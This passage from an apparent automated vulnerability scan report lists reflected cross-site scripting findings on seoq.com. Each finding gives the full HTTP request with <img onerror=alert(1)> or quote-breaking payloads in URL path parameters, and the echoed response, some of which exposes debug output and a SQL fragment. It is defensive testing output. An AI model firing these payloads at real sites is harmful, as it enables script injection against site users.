$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/28382955f';8adf3a8c684/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.122. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 36672<img%20src%3da%20onerror%3dalert(1)>78327454c47 was submitted in the REST URL parameter 6. This input was echoed as 36672<img src=a onerror=alert(1)>78327454c47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838/N36672<img%20src%3da%20onerror%3dalert(1)>78327454c47 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:00 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>78327454c47" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2838/N36672<img src=a onerror=alert(1)>78327454c47ddd</a>
...[SNIP]...

7.123. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce991'%3b7b1a3fc7dec was submitted in the REST URL parameter 6. This input was echoed as ce991';7b1a3fc7dec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2838/Nce991'%3b7b1a3fc7dec HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2838/Nce991';7b1a3fc7dec';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.124. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a547"><img%20src%3da%20onerror%3dalert(1)>e343fb66cd3 was submitted in the REST URL parameter 6. This input was echoed as 5a547"><img src=a onerror=alert(1)>e343fb66cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838/N5a547"><img%20src%3da%20onerror%3dalert(1)>e343fb66cd3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:57 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2838/N5a547"><img src=a onerror=alert(1)>e343fb66cd3" title="SEO Quotient for ">
...[SNIP]...

7.125. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6378'%3b3ce7bc260b was submitted in the REST URL parameter 5. This input was echoed as d6378';3ce7bc260b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2839d6378'%3b3ce7bc260b/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54545


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2839d6378';3ce7bc260b/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.126. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d53cd"><img%20src%3da%20onerror%3dalert(1)>ac4bf715a48 was submitted in the REST URL parameter 5. This input was echoed as d53cd"><img src=a onerror=alert(1)>ac4bf715a48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839d53cd"><img%20src%3da%20onerror%3dalert(1)>ac4bf715a48/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2839d53cd"><img src=a onerror=alert(1)>ac4bf715a48/N" title="SEO Quotient for ">
...[SNIP]...

7.127. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c05b2<img%20src%3da%20onerror%3dalert(1)>194b8082eef was submitted in the REST URL parameter 5. This input was echoed as c05b2<img src=a onerror=alert(1)>194b8082eef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839c05b2<img%20src%3da%20onerror%3dalert(1)>194b8082eef/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2839c05b2<img src=a onerror=alert(1)>194b8082eef and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.128. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d6f"><img%20src%3da%20onerror%3dalert(1)>4b93dd2f611 was submitted in the REST URL parameter 6. This input was echoed as 33d6f"><img src=a onerror=alert(1)>4b93dd2f611 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839/N33d6f"><img%20src%3da%20onerror%3dalert(1)>4b93dd2f611 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:07 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2839/N33d6f"><img src=a onerror=alert(1)>4b93dd2f611" title="SEO Quotient for ">
...[SNIP]...

7.129. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f954'%3bec1f05c8dbb was submitted in the REST URL parameter 6. This input was echoed as 3f954';ec1f05c8dbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2839/N3f954'%3bec1f05c8dbb HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2839/N3f954';ec1f05c8dbb';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.130. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d73b1<img%20src%3da%20onerror%3dalert(1)>cdb69d84558 was submitted in the REST URL parameter 6. This input was echoed as d73b1<img src=a onerror=alert(1)>cdb69d84558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2839/Nd73b1<img%20src%3da%20onerror%3dalert(1)>cdb69d84558 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:10 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>cdb69d84558" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2839/Nd73b1<img src=a onerror=alert(1)>cdb69d84558ddd</a>
...[SNIP]...

7.131. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 59bfb<img%20src%3da%20onerror%3dalert(1)>e704d38e1db was submitted in the REST URL parameter 5. This input was echoed as 59bfb<img src=a onerror=alert(1)>e704d38e1db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/284059bfb<img%20src%3da%20onerror%3dalert(1)>e704d38e1db/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 284059bfb<img src=a onerror=alert(1)>e704d38e1db and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.132. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72362'%3bc275c5ef75a was submitted in the REST URL parameter 5. This input was echoed as 72362';c275c5ef75a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/284072362'%3bc275c5ef75a/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/284072362';c275c5ef75a/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.133. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d076a"><img%20src%3da%20onerror%3dalert(1)>64f6b0d310c was submitted in the REST URL parameter 5. This input was echoed as d076a"><img src=a onerror=alert(1)>64f6b0d310c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2840d076a"><img%20src%3da%20onerror%3dalert(1)>64f6b0d310c/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2840d076a"><img src=a onerror=alert(1)>64f6b0d310c/N" title="SEO Quotient for ">
...[SNIP]...

7.134. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload caa13<img%20src%3da%20onerror%3dalert(1)>b022926bb8 was submitted in the REST URL parameter 6. This input was echoed as caa13<img src=a onerror=alert(1)>b022926bb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2840/Ncaa13<img%20src%3da%20onerror%3dalert(1)>b022926bb8 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:56 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>b022926bb8" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2840/Ncaa13<img src=a onerror=alert(1)>b022926bb8ddd</a>
...[SNIP]...

7.135. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42fd0'%3ba1480315da was submitted in the REST URL parameter 6. This input was echoed as 42fd0';a1480315da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2840/N42fd0'%3ba1480315da HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54494


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2840/N42fd0';a1480315da';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.136. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af28"><img%20src%3da%20onerror%3dalert(1)>658ceb1f789 was submitted in the REST URL parameter 6. This input was echoed as 5af28"><img src=a onerror=alert(1)>658ceb1f789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2840/N5af28"><img%20src%3da%20onerror%3dalert(1)>658ceb1f789 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:53 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2840/N5af28"><img src=a onerror=alert(1)>658ceb1f789" title="SEO Quotient for ">
...[SNIP]...

7.137. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

